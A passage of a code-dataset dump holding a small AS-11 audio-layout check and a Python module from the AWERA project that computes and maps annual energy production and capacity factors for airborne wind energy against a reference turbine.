hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c3c732fd1bf32628655f32cb83e5438752c6640 | 346 | py | Python | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | 2 | 2020-02-11T12:55:47.000Z | 2021-07-03T07:04:09.000Z | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | null | null | null | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | 1 | 2019-07-14T18:26:16.000Z | 2019-07-14T18:26:16.000Z | CHECK( AS_11_Audio_Track_Layout in [Layout_EBU_R_48_2a,
Layout_EBU_R_123_4b,
Layout_EBU_R_123_4c,
Layout_EBU_R_123_16c,
Layout_EBU_R_123_16d,
Layout_EBU_R_123_16f] )
| 49.428571 | 59 | 0.424855 | CHECK( AS_11_Audio_Track_Layout in [Layout_EBU_R_48_2a,
Layout_EBU_R_123_4b,
Layout_EBU_R_123_4c,
Layout_EBU_R_123_16c,
Layout_EBU_R_123_16d,
Layout_EBU_R_123_16f] )
| true | true |
1c3c73a1a99d2ef2de0e38c64ecbb54c3de9a447 | 16,577 | py | Python | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import pickle
import matplotlib as mpl
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
from ..utils.plotting_utils import plot_map
def get_mask_discontinuities(df):
    """Identify discontinuities in the power curves.

    The heuristic was obtained by trial and error and should be checked
    carefully when applying to newly generated power curves.

    Args:
        df (pandas.DataFrame): Power curve with columns 'P [W]' and
            'v_100m [m/s]'.

    Returns:
        pandas.Series: Boolean mask, True where a point is discontinuous.
    """
    power = df['P [W]']
    wind = df['v_100m [m/s]']
    # The first sample is always kept; afterwards a point is kept when the
    # power does not drop by more than 0.5 kW w.r.t. the previous point.
    no_big_drop = np.diff(power) > -5e2
    keep = np.concatenate(([True], no_big_drop))
    # Only apply the drop criterion at low wind speeds: points above
    # 10 m/s are always kept. (ufunc with a Series yields a Series, which
    # allows the .iloc assignment below.)
    keep = np.logical_or(keep, wind > 10)
    # Discard the final point when the curve ends negative or jumps up by
    # more than 0.5 kW right at the end.
    p_last = power.iloc[-1]
    if p_last < 0 or p_last - power.iloc[-2] > 5e2:
        keep.iloc[-1] = False
    return ~keep
def plot_aep_matrix(config, freq, power, aep, plot_info=''):
    """Visualize the annual energy production contributions of each wind
    speed bin.

    Draws three matrices (cluster x wind speed bin) side by side: bin
    probability [%], bin power [kW] and the resulting AEP contribution
    [MWh]. The figure is saved as a pdf when interactive plotting is off.

    Args:
        config: Configuration object providing Plotting.plots_interactive
            and IO.result_dir.
        freq (ndarray): Occurrence probability [%] per cluster and bin,
            shape (n_clusters, n_bins).
        power (ndarray): Power output [W] per cluster and bin, same shape.
        aep (ndarray): AEP contribution [Wh] per cluster and bin, same shape.
        plot_info (str): Suffix appended to the output file name.
    """
    n_clusters = freq.shape[0]
    # Mask zero entries so empty bins stay uncolored in imshow.
    mask_array = lambda m: np.ma.masked_where(m == 0., m)
    fig, ax = plt.subplots(1, 3, sharex=True, sharey=True, figsize=(7, 3.5))
    plt.subplots_adjust(top=0.98, bottom=0.05, left=0.065, right=0.98)
    ax[0].set_ylabel("Cluster label [-]")
    ax[0].set_yticks(range(n_clusters))
    ax[0].set_yticklabels(range(1, n_clusters+1))
    for a in ax:
        a.set_xticks((0, freq.shape[1]-1))
        a.set_xticklabels(('cut-in', 'cut-out'))
    im0 = ax[0].imshow(mask_array(freq), aspect='auto')
    cbar0 = plt.colorbar(im0, orientation="horizontal", ax=ax[0], aspect=12,
                         pad=.17)
    cbar0.set_label("Probability [%]")
    im1 = ax[1].imshow(mask_array(power)*1e-3, aspect='auto')  # W -> kW
    cbar1 = plt.colorbar(im1, orientation="horizontal", ax=ax[1], aspect=12,
                         pad=.17)
    cbar1.set_label("Power [kW]")
    im2 = ax[2].imshow(mask_array(aep)*1e-6, aspect='auto')  # Wh -> MWh
    cbar2 = plt.colorbar(im2, orientation="horizontal", ax=ax[2], aspect=12,
                         pad=.17)
    cbar2.set_label("AEP contribution [MWh]")
    if not config.Plotting.plots_interactive:
        # NOTE(review): 'conribution' looks like a typo in the output file
        # name; kept as-is since downstream tooling may rely on it.
        plt.savefig(config.IO.result_dir + 'aep_production_conribution'
                    + plot_info + '.pdf')
def evaluate_aep(config):
    """Calculate the annual energy production for the requested cluster wind
    resource representation. Reads the wind speed distribution file, then
    the csv file of each power curve, post-processes the curve, and
    numerically integrates the product of the power and probability curves
    to determine the AEP.

    Args:
        config: Configuration object providing Clustering.n_clusters,
            Data.locations, Data.n_locs, IO.freq_distr and IO.power_curve.

    Returns:
        tuple:
            - loc_aep (list of float): AEP [MWh] for every location.
            - aep_n_max (float): Nominal AEP [MWh], i.e. a full year of
              operation at the maximum nominal cluster power.
    """
    n_clusters = config.Clustering.n_clusters
    # Load the pre-computed frequency distribution: probability [%] per
    # location, cluster and wind speed bin, plus the bin limits.
    with open(config.IO.freq_distr, 'rb') as f:
        freq_distr = pickle.load(f)
    freq_full = freq_distr['frequency']
    wind_speed_bin_limits = freq_distr['wind_speed_bin_limits']
    loc_aep = []
    p_n = []
    for i_loc, loc in enumerate(config.Data.locations):
        # Select location data
        freq = freq_full[i_loc, :, :]
        p_bins = np.zeros(freq.shape)
        for i in range(n_clusters):
            i_profile = i + 1
            # Read power curve file
            # TODO make optional trianing / normal
            df = pd.read_csv(config.IO.power_curve
                             .format(suffix='csv',
                                     i_profile=i_profile),
                             sep=";")
            # TODO drop? mask_faulty_point = get_mask_discontinuities(df)
            v = df['v_100m [m/s]'].values  # .values[~mask_faulty_point]
            p = df['P [W]'].values  # .values[~mask_faulty_point]
            if i_loc == 0:
                # Once extract nominal (maximal) power of cluster
                p_n.append(np.max(p))
            # assert v[0] == wind_speed_bin_limits[i, 0]
            # TODO differences at 10th decimal threw assertion error
            # Warn (instead of assert) when the power curve wind speed range
            # does not match the probability distribution's bin limits.
            err_str = "Wind speed range of power curve {} is different"\
                " than that of probability distribution: " \
                "{:.2f} and {:.2f} m/s, respectively."
            if np.abs(v[0] - wind_speed_bin_limits[i, 0]) > 1e-6:
                print(err_str.format(i_profile,
                                     wind_speed_bin_limits[i, 0], v[0]))
            if np.abs(v[-1] - wind_speed_bin_limits[i, -1]) > 1e-6:
                print(err_str.format(i_profile,
                                     wind_speed_bin_limits[i, -1], v[-1]))
            # assert np.abs(v[-1] -
            #               wind_speed_bin_limits[i, -1]) < 1e-6, err_str
            # Determine wind speeds at bin centers and respective power output.
            v_bins = (wind_speed_bin_limits[i, :-1]
                      + wind_speed_bin_limits[i, 1:])/2.
            p_bins[i, :] = np.interp(v_bins, v, p, left=0., right=0.)
        # Weight profile energy production with the frequency of the cluster
        # sum(freq) < 100: non-operation times included
        aep_bins = p_bins * freq/100. * 24*365
        aep_sum = np.sum(aep_bins)*1e-6  # Wh -> MWh
        loc_aep.append(aep_sum)
        if i_loc % 100 == 0:
            # Progress output only every 100th location.
            print("AEP: {:.2f} MWh".format(aep_sum))
        # plot_aep_matrix(config, freq, p_bins, aep_bins,
        #                 plot_info=(config.Data.data_info+str(i_loc)))
        # print(('AEP matrix plotted for location number'
        #        ' {} of {} - at lat {}, lon {}').format(i_loc,
        #                                                config.Data.n_locs,
        #                                                loc[0], loc[1]))
    # Estimate perfectly running & perfect conditions: nominal power
    # get relative cluster frequency:
    rel_cluster_freq = np.sum(freq_full, axis=(0, 2))/config.Data.n_locs
    print('Cluster frequency:', rel_cluster_freq)
    print('Cluster frequency sum:', np.sum(rel_cluster_freq))
    # Scale up to 1: run full time with same relative impact of clusters
    rel_cluster_freq = rel_cluster_freq/np.sum(rel_cluster_freq)
    aep_n_cluster = np.sum(np.array(p_n)*rel_cluster_freq)*24*365*1e-6
    aep_n_max = np.max(p_n)*24*365*1e-6
    print('Nominal aep [MWh]:', aep_n_cluster, aep_n_max)
    # TODO write aep to file
    return loc_aep, aep_n_max
# TODO nominal AEP -> average power and nominal power
def plot_aep_map(p_loc, aep_loc, c_f_loc,
                 plots_interactive=True,
                 file_name='aep_p_cf_contour_maps.pdf',
                 file_name_aep='aep_contour_map.pdf'):
    """Plot contour maps of mean cycle power, AEP and capacity factor.

    Produces a 1x3 panel plot (power / AEP / capacity factor) and an
    additional single AEP map. Figures are saved as pdfs when interactive
    plotting is off.

    Args:
        p_loc: Gridded mean cycle power [kW].
        aep_loc: Gridded AEP [MWh/a].
        c_f_loc: Gridded capacity factor [-] (multiplied by 100 here).
        plots_interactive (bool): If False, save figures to file.
        file_name (str): Output file for the 1x3 panel.
        file_name_aep (str): Output file for the single AEP map.
    """
    from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
        plot_panel_1x3_seperate_colorbar
    column_titles = ['Mean Cycle Power', 'AEP', r'$c_f$']
    # Each plot item bundles the data with its contour/colorbar settings.
    linspace00 = np.linspace(0, 6, 21)
    plot_item00 = {
        'data': p_loc,
        'contour_fill_levels': linspace00,
        'contour_line_levels': [1, 3, 6],
        'contour_line_label_fmt': '%.0f',
        'colorbar_ticks': linspace00[::4],
        'colorbar_tick_fmt': '{:.0f}',
        'colorbar_label': 'P [kW]',
        'extend': 'max',
    }
    linspace01 = np.linspace(0, 54, 21)
    plot_item01 = {
        'data': aep_loc,
        'contour_fill_levels': linspace01,
        'contour_line_levels': [10., 30., 50.],
        'contour_line_label_fmt': '%.0f',
        'colorbar_ticks': linspace01[::4],
        'colorbar_tick_fmt': '{:.0f}',
        'colorbar_label': 'AEP [MWh/a]',
        'extend': 'max',
    }
    linspace02 = np.linspace(0, 60, 21)
    plot_item02 = {
        'data': c_f_loc*100,  # fraction -> percent
        'contour_fill_levels': linspace02,
        'contour_line_levels': [20., 40., 60.],
        'contour_line_label_fmt': '%.0f',
        'colorbar_ticks': linspace02[::4],
        'colorbar_tick_fmt': '{:.0f}',
        'colorbar_label': r'c$_f$ [%]',
        # 'extend': 'max',
    }
    plot_items = [plot_item00, plot_item01, plot_item02]
    eval_contour_fill_levels(plot_items)
    plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
    if not plots_interactive:
        plt.savefig(file_name)
    # Additionally plot the AEP on its own map.
    from ..utils.plotting_utils import plot_single_map
    plot_single_map(aep_loc, title='', label='',
                    plot_item=plot_item01)
    if not plots_interactive:
        plt.savefig(file_name_aep)
def plot_cf_map(cf_1, cf_2):
    """Plot capacity factor maps of two technologies side by side.

    Renders a 1x3 contour panel: turbine, AWE and (repeated) turbine
    capacity factor in percent, all sharing the same contour settings.
    """
    from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
        plot_panel_1x3_seperate_colorbar
    column_titles = [r'c$_f$ Turbine', r'c$_f$ AWE', r'c$_f$ Turbine']

    def make_item(data):
        # All panels use identical contour/colorbar settings; each gets
        # its own fill-level array (0..65 % in 21 steps).
        levels = np.linspace(0, 65, 21)
        return {
            'data': data*100,  # fraction -> percent
            'contour_fill_levels': levels,
            'contour_line_levels': [20., 40., 60.],
            'contour_line_label_fmt': '%.0f',
            'colorbar_ticks': levels[::4],
            'colorbar_tick_fmt': '{:.0f}',
            'colorbar_label': r'c$_f$ [%]',
            # 'extend': 'max',
        }

    # TODO plot only 2
    plot_items = [make_item(cf_1), make_item(cf_2), make_item(cf_1)]
    eval_contour_fill_levels(plot_items)
    plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
def plot_discrete_map(config, values, title='', label='',
                      plots_interactive=True,
                      file_name='discrete_map.pdf'):
    """Plot gridded values as a colored mesh on a Mercator map.

    Args:
        config: Configuration object providing the map extent
            (Data.lon_range, Data.lat_range) and the grid coordinates
            (Data.all_lons, Data.all_lats).
        values: 2D gridded values to color (lat x lon).
        title (str): Figure title.
        label (str): Colorbar label.
        plots_interactive (bool): If False, save the figure to file.
        file_name (str): Output pdf file name.
    """
    # Map range
    cm = 1/2.54  # centimeters to inches for figsize
    # Plot Value
    plt.figure(figsize=(13*cm, 14.5*cm))
    mrc = ccrs.Mercator()
    ax = plt.axes(projection=mrc)
    ax.coastlines(zorder=4)
    # TODO resolution='50m', color='black', linewidth=1)
    ax.set_extent([config.Data.lon_range[0],
                   config.Data.lon_range[1],
                   config.Data.lat_range[0],
                   config.Data.lat_range[1]])
    plt.title(title)
    color_map = plt.get_cmap('YlOrRd')
    # Scale the colormap to the data range.
    normalize = mpl.colors.Normalize(vmin=np.min(values),
                                     vmax=np.max(values))
    lons_grid, lats_grid = np.meshgrid(config.Data.all_lons,
                                       config.Data.all_lats)
    # Compute map projection coordinates.
    # TODO does this work now? threw error too many values to unpack
    # - works locally
    # Data is in lat/lon, hence the PlateCarree transform.
    ax.pcolormesh(lons_grid, lats_grid, values,
                  cmap=color_map, norm=normalize,
                  transform=cartopy.crs.PlateCarree(),
                  zorder=3)
    cbar_ax, _ = mpl.colorbar.make_axes(ax)
    mpl.colorbar.ColorbarBase(cbar_ax, cmap=color_map, norm=normalize,
                              label=label)
    if not plots_interactive:
        plt.savefig(file_name)
def aep_map(config):
    """Evaluate the AEP for all configured locations and plot the results.

    Computes per-location AEP, mean cycle power and capacity factor, fills
    them into the full lat/lon grid (unevaluated grid points stay masked)
    and plots either continuous contour maps (full grid coverage) or a
    discrete map (partial coverage).

    Args:
        config: Configuration object providing the grid
            (Data.all_lats/all_lons, Data.i_locations), plotting settings
            and output file locations.

    Returns:
        tuple: (aep_loc, c_f_loc) masked gridded AEP [MWh] and capacity
        factor [-].
    """
    # TODO cleanup - what is needed in the end?
    aep, aep_n = evaluate_aep(config)
    # TODO reinclude map plotting
    # Match locations with values - rest NaN
    n_lats = len(config.Data.all_lats)
    n_lons = len(config.Data.all_lons)
    # Fully masked grids; only evaluated locations get unmasked below.
    p_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
    aep_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
    c_f_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
    # TODO right way around?
    for i, i_loc in enumerate(config.Data.i_locations):
        p_loc[i_loc[0], i_loc[1]] = aep[i]/365/24*1000  # p [kW]
        aep_loc[i_loc[0], i_loc[1]] = aep[i]  # aep [MWh]
        c_f_loc[i_loc[0], i_loc[1]] = aep[i]/aep_n  # c_f [-]
    if np.sum(p_loc.mask) == 0:
        # All grid points evaluated: plot continuous contour maps.
        print('Location wise AEP determined. Plot map:')
        # plot_aep_map(p_loc, aep_loc, c_f_loc,
        #              plots_interactive=config.Plotting.plots_interactive,
        #              file_name=config.IO.plot_output.format(
        #                  title='aep_p_cf_contour_maps'),
        #              file_name_aep=config.IO.plot_output.format(
        #                  title='aep_contour_map')
        #              )
        # Plot single
        plot_map(config, aep_loc,
                 title='AEP',
                 label=r'AEP [MWh/a]',
                 log_scale=False,
                 n_decimals=0,
                 output_file_name=config.IO.plot_output.format(
                     title='aep_map'),
                 line_levels=[10., 30., 50.],
                 fill_range=[0, 54],
                 overflow=None)
        plot_map(config, p_loc,
                 title='Mean Cycle Power',
                 label='P [kW]',
                 log_scale=False,
                 n_decimals=0,
                 output_file_name=config.IO.plot_output.format(
                     title='p_map'),
                 line_levels=[1., 3., 6.],
                 fill_range=[0, 6],
                 overflow=None)
        plot_map(config, c_f_loc*100,
                 title=r'$c_f$',
                 label=r'$c_f$ [%]',
                 log_scale=False,
                 n_decimals=0,
                 output_file_name=config.IO.plot_output.format(
                     title='cf_map'),
                 line_levels=[20., 40., 60.],
                 fill_range=[0, 60],
                 overflow=None)
    else:
        # Only a subset of grid points evaluated: fall back to a
        # discrete (pcolormesh) map.
        plot_discrete_map(config,
                          aep_loc,
                          title="AEP for {} clusters".format(
                              config.Clustering.n_clusters),
                          label='AEP [MWh]',
                          plots_interactive=config.Plotting.plots_interactive,
                          file_name=config.IO.plot_output.format(
                              title='aep_discrete_map')
                          )
        # plot_discrete_map(config,
        #                   c_f_loc,
        #                   title="Capacity factor for {} clusters".format(
        #                       config.Clustering.n_clusters),
        #                   label=r'c$_f$ [-]',
        #                   plots_interactive=config.Plotting.plots_interactive,
        #                   file_name=config.IO.plot_output.format(
        #                       title='cf_discrete_map'))
    return aep_loc, c_f_loc
def cf_turbine(config):
    """Estimate the capacity factor of a reference wind turbine per location.

    Uses the REpower MM82 power curve evaluated at hub-height (60 m) wind
    speeds, with the air density from the barometric height formula.

    Args:
        config: Configuration object passed to the wind-speed sampling and
            mapping helpers.

    Returns:
        Gridded capacity factor (output of match_loc_data_map_data).
    """
    p_max = 2.04e6  # rated power [W]
    # get sample wind speeds at 60m
    turb_height = 60  # m
    from ..eval.optimal_harvesting_height import get_wind_speed_at_height, \
        barometric_height_formula, match_loc_data_map_data
    v_turb, _ = get_wind_speed_at_height(config, set_height=turb_height)
    # Get Rho at turb height
    rho = barometric_height_formula(turb_height)

    def calc_turbine_power(v, rho):
        # REpower MM82
        # https://www.thewindpower.net/store_manufacturer_turbine_en.php?id_type=7
        # Quadratic fit coefficients of the power curve (np.polyval order).
        power_coeff = np.array([23070., -111500., 134600.])
        # p = np.zeros((len(v[:,0]), len(v[0,:])))
        # Vectorized power curve: 0 below cut-in (2.5 m/s) and above
        # cut-out (22 m/s), rated between 11.7 and 22 m/s, polynomial fit
        # in between; all scaled by the density ratio and capped at 2 MW.
        p = np.zeros(v.shape)
        p[v < 2.5] = 0
        p[v > 11.7] = rho/1.01325*2000000.
        p[v > 22.] = 0
        p[np.logical_and(v >= 2.5, v <= 11.7)] = rho/1.01325*np.polyval(
            power_coeff, v[np.logical_and(v >= 2.5, v <= 11.7)])
        p[p > 2000000.] = 2000000.
        # for i_t in range(len(v)):
        #     if v[i_t] < 2.5:
        #         p[i_t] = 0.
        #     elif v[i_t] > 11.7:
        #         p[i_t] = rho/1.01325*2000000.
        #         if p[i_t] > 2000000.:
        #             p[i_t] = 2000000.
        #     elif v[i_t] > 22.:
        #         p[i_t] = 0.
        #     else:
        #         p[i_t] = rho/1.01325*np.polyval(power_coeff, v[i_t])
        #         if p[i_t] > 2000000.:
        #             p[i_t] = 2000000.
        # print(rho)
        return p
    p = calc_turbine_power(v_turb, rho)
    # aep = np.mean(p, axis=1)*365*24
    # Capacity factor: mean produced power over rated power.
    # NOTE(review): assumes axis 1 of v_turb is the time axis — confirm
    # against get_wind_speed_at_height.
    cf = np.mean(p, axis=1) / p_max
    return match_loc_data_map_data(config, cf)
def compare_cf_AWE_turbine(config):
    """Compare the capacity factor of the reference wind turbine with that
    of the AWE system on a map and show the figures."""
    turbine_cf = cf_turbine(config)
    _, awe_cf = aep_map(config)
    plot_cf_map(turbine_cf, awe_cf)
    plt.show()
# Command-line entry point: compute and plot the AEP map for the default
# configuration.
if __name__ == "__main__":
    # NOTE(review): the relative import only works when the file is run as
    # a module (python -m ...), not as a plain script.
    from ..config import Config
    config = Config()
    # TODO include this into aep from own plotting
    # plot_power_and_wind_speed_probability_curves() #TODO where??
    aep_map(config)
    if config.Plotting.plots_interactive:
        plt.show()
| 39.657895 | 93 | 0.563069 | import numpy as np
import pandas as pd
import pickle
import matplotlib as mpl
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
from ..utils.plotting_utils import plot_map
def get_mask_discontinuities(df):
mask = np.concatenate(((True,), (np.diff(df['P [W]']) > -5e2)))
mask = np.logical_or(mask, df['v_100m [m/s]'] > 10)
if df['P [W]'].iloc[-1] < 0 or df['P [W]'].iloc[-1] - df['P [W]'].iloc[-2] > 5e2:
mask.iloc[-1] = False
return ~mask
def plot_aep_matrix(config, freq, power, aep, plot_info=''):
n_clusters = freq.shape[0]
mask_array = lambda m: np.ma.masked_where(m == 0., m)
fig, ax = plt.subplots(1, 3, sharex=True, sharey=True, figsize=(7, 3.5))
plt.subplots_adjust(top=0.98, bottom=0.05, left=0.065, right=0.98)
ax[0].set_ylabel("Cluster label [-]")
ax[0].set_yticks(range(n_clusters))
ax[0].set_yticklabels(range(1, n_clusters+1))
for a in ax:
a.set_xticks((0, freq.shape[1]-1))
a.set_xticklabels(('cut-in', 'cut-out'))
im0 = ax[0].imshow(mask_array(freq), aspect='auto')
cbar0 = plt.colorbar(im0, orientation="horizontal", ax=ax[0], aspect=12,
pad=.17)
cbar0.set_label("Probability [%]")
im1 = ax[1].imshow(mask_array(power)*1e-3, aspect='auto')
cbar1 = plt.colorbar(im1, orientation="horizontal", ax=ax[1], aspect=12,
pad=.17)
cbar1.set_label("Power [kW]")
im2 = ax[2].imshow(mask_array(aep)*1e-6, aspect='auto')
cbar2 = plt.colorbar(im2, orientation="horizontal", ax=ax[2], aspect=12,
pad=.17)
cbar2.set_label("AEP contribution [MWh]")
if not config.Plotting.plots_interactive:
plt.savefig(config.IO.result_dir + 'aep_production_conribution'
+ plot_info + '.pdf')
def evaluate_aep(config):
n_clusters = config.Clustering.n_clusters
with open(config.IO.freq_distr, 'rb') as f:
freq_distr = pickle.load(f)
freq_full = freq_distr['frequency']
wind_speed_bin_limits = freq_distr['wind_speed_bin_limits']
loc_aep = []
p_n = []
for i_loc, loc in enumerate(config.Data.locations):
freq = freq_full[i_loc, :, :]
p_bins = np.zeros(freq.shape)
for i in range(n_clusters):
i_profile = i + 1
df = pd.read_csv(config.IO.power_curve
.format(suffix='csv',
i_profile=i_profile),
sep=";")
v = df['v_100m [m/s]'].values
p = df['P [W]'].values
if i_loc == 0:
p_n.append(np.max(p))
err_str = "Wind speed range of power curve {} is different"\
" than that of probability distribution: " \
"{:.2f} and {:.2f} m/s, respectively."
if np.abs(v[0] - wind_speed_bin_limits[i, 0]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, 0], v[0]))
if np.abs(v[-1] - wind_speed_bin_limits[i, -1]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, -1], v[-1]))
v_bins = (wind_speed_bin_limits[i, :-1]
+ wind_speed_bin_limits[i, 1:])/2.
p_bins[i, :] = np.interp(v_bins, v, p, left=0., right=0.)
aep_bins = p_bins * freq/100. * 24*365
aep_sum = np.sum(aep_bins)*1e-6
loc_aep.append(aep_sum)
if i_loc % 100 == 0:
print("AEP: {:.2f} MWh".format(aep_sum))
rel_cluster_freq = np.sum(freq_full, axis=(0, 2))/config.Data.n_locs
print('Cluster frequency:', rel_cluster_freq)
print('Cluster frequency sum:', np.sum(rel_cluster_freq))
rel_cluster_freq = rel_cluster_freq/np.sum(rel_cluster_freq)
aep_n_cluster = np.sum(np.array(p_n)*rel_cluster_freq)*24*365*1e-6
aep_n_max = np.max(p_n)*24*365*1e-6
print('Nominal aep [MWh]:', aep_n_cluster, aep_n_max)
return loc_aep, aep_n_max
def plot_aep_map(p_loc, aep_loc, c_f_loc,
plots_interactive=True,
file_name='aep_p_cf_contour_maps.pdf',
file_name_aep='aep_contour_map.pdf'):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = ['Mean Cycle Power', 'AEP', r'$c_f$']
linspace00 = np.linspace(0, 6, 21)
plot_item00 = {
'data': p_loc,
'contour_fill_levels': linspace00,
'contour_line_levels': [1, 3, 6],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'P [kW]',
'extend': 'max',
}
linspace01 = np.linspace(0, 54, 21)
plot_item01 = {
'data': aep_loc,
'contour_fill_levels': linspace01,
'contour_line_levels': [10., 30., 50.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'AEP [MWh/a]',
'extend': 'max',
}
linspace02 = np.linspace(0, 60, 21)
plot_item02 = {
'data': c_f_loc*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
if not plots_interactive:
plt.savefig(file_name)
from ..utils.plotting_utils import plot_single_map
plot_single_map(aep_loc, title='', label='',
plot_item=plot_item01)
if not plots_interactive:
plt.savefig(file_name_aep)
def plot_cf_map(cf_1, cf_2):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = [r'c$_f$ Turbine', r'c$_f$ AWE', r'c$_f$ Turbine']
linspace00 = np.linspace(0, 65, 21)
plot_item00 = {
'data': cf_1*100,
'contour_fill_levels': linspace00,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
linspace01 = np.linspace(0, 65, 21)
plot_item01 = {
'data': cf_2*100,
'contour_fill_levels': linspace01,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
linspace02 = np.linspace(0, 65, 21)
plot_item02 = {
'data': cf_1*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
def plot_discrete_map(config, values, title='', label='',
plots_interactive=True,
file_name='discrete_map.pdf'):
cm = 1/2.54
plt.figure(figsize=(13*cm, 14.5*cm))
mrc = ccrs.Mercator()
ax = plt.axes(projection=mrc)
ax.coastlines(zorder=4)
ax.set_extent([config.Data.lon_range[0],
config.Data.lon_range[1],
config.Data.lat_range[0],
config.Data.lat_range[1]])
plt.title(title)
color_map = plt.get_cmap('YlOrRd')
normalize = mpl.colors.Normalize(vmin=np.min(values),
vmax=np.max(values))
lons_grid, lats_grid = np.meshgrid(config.Data.all_lons,
config.Data.all_lats)
ax.pcolormesh(lons_grid, lats_grid, values,
cmap=color_map, norm=normalize,
transform=cartopy.crs.PlateCarree(),
zorder=3)
cbar_ax, _ = mpl.colorbar.make_axes(ax)
mpl.colorbar.ColorbarBase(cbar_ax, cmap=color_map, norm=normalize,
label=label)
if not plots_interactive:
plt.savefig(file_name)
def aep_map(config):
aep, aep_n = evaluate_aep(config)
n_lats = len(config.Data.all_lats)
n_lons = len(config.Data.all_lons)
p_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
aep_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
c_f_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
for i, i_loc in enumerate(config.Data.i_locations):
p_loc[i_loc[0], i_loc[1]] = aep[i]/365/24*1000
aep_loc[i_loc[0], i_loc[1]] = aep[i]
c_f_loc[i_loc[0], i_loc[1]] = aep[i]/aep_n
if np.sum(p_loc.mask) == 0:
print('Location wise AEP determined. Plot map:')
plot_map(config, aep_loc,
title='AEP',
label=r'AEP [MWh/a]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='aep_map'),
line_levels=[10., 30., 50.],
fill_range=[0, 54],
overflow=None)
plot_map(config, p_loc,
title='Mean Cycle Power',
label='P [kW]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='p_map'),
line_levels=[1., 3., 6.],
